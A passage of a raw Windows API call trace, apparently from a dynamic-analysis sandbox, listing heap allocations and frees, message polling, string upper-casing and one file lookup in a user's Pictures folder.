[0210.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0210.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71aa8 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0210.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0210.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0210.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0210.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0210.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0210.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0210.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0210.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0210.796] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0210.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0210.796] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0210.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0210.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0210.797] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0210.797] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0210.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0210.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0210.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0210.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0210.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0210.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0210.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0210.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0210.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0210.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0210.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.798] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0210.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0210.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0210.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0210.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0210.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0210.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0210.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0210.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0210.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0210.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0210.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0210.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0210.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0210.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0210.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0210.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0210.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0210.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0210.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0210.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0210.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0210.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0210.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0210.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0210.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.801] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/LXxgX8.png", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a6af340, ftCreationTime.dwHighDateTime=0x1d5d2e8, ftLastAccessTime.dwLowDateTime=0x2074fe10, ftLastAccessTime.dwHighDateTime=0x1d5d802, ftLastWriteTime.dwLowDateTime=0x2074fe10, ftLastWriteTime.dwHighDateTime=0x1d5d802, nFileSizeHigh=0x0, nFileSizeLow=0x99c9, dwReserved0=0x0, dwReserved1=0x0, cFileName="LXxgX8.png", cAlternateFileName="")) returned 0x9e1bf8 [0210.801] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0210.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0210.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0210.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0210.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0210.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0210.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0210.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0210.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0210.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.803] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.803] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 